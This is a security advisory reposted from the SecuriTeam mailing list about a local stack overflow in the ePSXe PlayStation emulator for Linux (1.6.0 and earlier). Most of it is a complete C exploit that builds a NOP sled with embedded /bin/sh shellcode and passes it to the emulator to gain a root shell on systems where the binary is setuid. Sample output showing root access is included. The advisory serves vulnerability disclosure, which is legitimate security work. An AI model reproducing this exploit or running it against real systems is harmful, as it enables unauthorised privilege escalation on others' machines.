The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
ePSXe Local Stack Overflow (Exploit)
------------------------------------------------------------------------
SUMMARY
<http://www.epsxe.com/ > ePSXe is "a PSX(Sony PlayStation) emulator for
Linux". The following exploit code will use a locally exploitable stack
overflow in ePSXe to gain root privileges on systems that have the setuid
bit set on the ePSXe program.
DETAILS
Vulnerable Systems:
* ePSXe emulator version 1.6.0 and prior
Exploit:
/* epsxe-e.c
ePSXe v1.* local exploit
By: Qnix
e-mail: q-nix[at]hotmail[dot]com
ePSXe-website: www.epsxe.com
EXP-Sample:
root@Qnix:~/epsxe# gcc -o epsxe-e epsxe-e.c
root@Qnix:~/epsxe# ./epsxe-e
*************************************
ePSXe v1.* local exploit
by
Qnix | Q-nix[at]hotmail[dot]com
*************************************
[~] Stack pointer (ESP) : 0xbffff568
[~] Offset from ESP : 0x0
[~] Desired Return Addr : 0xbffff568
* Running ePSXe emulator version 1.6.0.
* Memory handlers init.
sh-2.05b# id
uid=0(root) gid=0(root)
groups=0(root), 1(bin), 2(daemon), 3(sys), 4(adm), 6(disk), 10(wheel),
11(floppy)
*/
#include <stdlib.h>
char shellcode[] =
"\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0"
"\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d"
"\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73"
"\x68";
unsigned long sp(void)
{ __asm__("movl %esp, %eax");}
int main(int argc, char *argv[])
{
int i, offset;
long esp, ret, *addr_ptr;
char *buffer, *ptr;
offset = 0;
esp = sp();
ret = esp - offset;
printf("\n ************************************* \n");
printf(" ePSXe v1.* local exploit \n");
printf(" by \n");
printf(" Qnix | Q-nix[at]hotmail[dot]com ");
printf("\n ************************************* \n\n");
printf("[~] Stack pointer (ESP) : 0x%x\n", esp);
printf("[~] Offset from ESP : 0x%x\n", offset);
printf("[~] Desired Return Addr : 0x%x\n\n", ret);
buffer = malloc(600);
ptr = buffer;
addr_ptr = (long *) ptr;
for(i=0; i < 600; i+=4)
{ *(addr_ptr++) = ret; }
for(i=0; i < 200; i++)
{ buffer[i] = '\x90'; }
ptr = buffer + 200;
for(i=0; i < strlen(shellcode); i++)
{ *(ptr++) = shellcode[i]; }
buffer[600-1] = 0;
execl("./epsxe", "epsxe", "-nogui", buffer, 0);
free(buffer);
return 0;
}
ADDITIONAL INFORMATION
The information has been provided by <mailto:q-nix[at]hotmail[dot]com>
Qnix.
========================================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
No comments:
Post a Comment